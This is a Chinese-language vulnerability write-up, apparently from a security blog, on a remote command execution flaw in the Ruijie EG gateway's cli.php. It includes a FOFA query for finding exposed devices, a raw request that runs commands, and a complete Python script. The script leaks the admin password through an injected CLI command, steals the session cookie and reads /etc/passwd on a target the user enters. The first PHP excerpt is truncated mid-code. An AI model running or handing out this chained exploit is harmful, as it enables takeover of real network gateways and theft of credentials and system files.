锐捷EG易网关_cli.php_远程命令执行漏洞

# 锐捷EG易网关 cli.php 远程命令执行漏洞

## 漏洞描述

锐捷EG易网关 cli.php存在命令执行漏洞,配合 锐捷EG易网关 管理员账号密码泄露漏洞 达到RCE控制服务器

## 漏洞影响

> 锐捷EG易网关

## FOFA

> app=”Ruijie-EG易网关”

## 漏洞复现

首先登录到后台中(可以组合 锐捷EG易网关 管理员账号密码泄露漏洞)

漏洞文件 cli.php

“`php
true,
“data” => $content);
json_echo($data);
}

/**
* 获取系统时间
*/
public function dateAction() {
setTimeZone();
$data[‘status’] = true;
$data[“data”][“time”] = date(“Y-m-d H:i:s”);
$data[“data”][“zone”] = “UTC” . getTimeZone();
json_echo($data);
}

/**
* 获取系统时区
*/
public function datezoneAction() {
$data[‘status’] = true;
$data[“data”] = getTimeZone();
json_echo($data);
}

/**
* 检测静态页面时候未登录直接进入
*/
public function checkloginAction() {
json_echo(array(“status” => true));
}

}

include_once(AROOT . “init.php”); //mvc初始化入口,放在底部
“`

关键部分代码为

“`php
/**
* 执行shell脚本
*/
public function shellAction() {
$command = p(“command”);
if ($command == false) {
$data[“status”] = 2;
$data[“msg”] = “no command”;
json_echo($data);
exit();
}
$content = [];
exec(EscapeShellCmd($command), $content);
$data = array(“status” => true,
“data” => $content);
json_echo($data);
}
“`

command参数直接传入执行了命令

发送请求包

“`
POST /cli.php?a=shell HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 24
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=nk5erth9i0pvcco3n7fbpa9bi0;user=admin;
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

notdelay=true&command=id
“`

![](/static/qingy/锐捷EG易网关_cli.php_远程命令执行漏洞/img/ruijie-28.png)

## 漏洞POC

“`python
#!/usr/bin/python3
#-*- coding:utf-8 -*-

import base64
import requests
import random
import re
import json
import sys

def POC_1(target_url):
vuln_url = target_url + “/login.php”
headers = {
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36”,
“Content-Type”: “application/x-www-form-urlencoded”
}
data = ‘username=admin&password=admin?show+webmaster+user’
try:
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
print(“\033[36m[o] 正在执行 show webmaster user \033[0m”.format(target_url))
if “data” in response.text and response.status_code == 200:
password = re.findall(r’admin (.*?)”‘, response.text)[0]
print(“\033[36m[o] 成功获取, 账号密码为: admin {} \033[0m”.format(password))
POC_2(target_url, password)
except Exception as e:
print(“\033[31m[x] 请求失败:{} \033[0m”.format(e))
sys.exit(0)

def POC_2(target_url, password):
vuln_url = target_url + “/login.php”
headers = {
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36”,
“Content-Type”: “application/x-www-form-urlencoded”
}
data = ‘username=admin&password={}’.format(password)
try:
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
print(“\033[36m[o] 正在登录….. \033[0m”.format(target_url))
if “status” in response.text and “1” in response.text and response.status_code == 200:
ruijie_cookie = “RUIJIEID=” + re.findall(r”‘Set-Cookie’: ‘RUIJIEID=(.*?);”, str(response.headers))[0] + “;user=admin;”
print(“\033[36m[o] 成功获取管理员Cookie: {} \033[0m”.format(ruijie_cookie))
POC_3(target_url, ruijie_cookie)

except Exception as e:
print(“\033[31m[x] 请求失败:{} \033[0m”.format(e))
sys.exit(0)

def POC_3(target_url, ruijie_cookie):
vuln_url = target_url + “/cli.php?a=shell”
headers = {
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36”,
“Content-Type”: “application/x-www-form-urlencoded”,
“Cookie”: “{}”.format(ruijie_cookie)
}
data = ‘notdelay=true&command=cat /etc/passwd’
try:
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
print(“\033[36m[o] 正在执行 cat /etc/passwd….. \033[0m”.format(target_url))
if “root:” in response.text and response.status_code == 200:
print(“\033[36m[o] 成功读取 /etc/passwd \n[o] 响应为:{} \033[0m”.format(response.text))

except Exception as e:
print(“\033[31m[x] 请求失败:{} \033[0m”.format(e))
sys.exit(0)

if __name__ == ‘__main__’:
title()
target_url = str(input(“\033[35mPlease input Attack Url\nUrl >>> \033[0m”))
POC_1(target_url)

“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容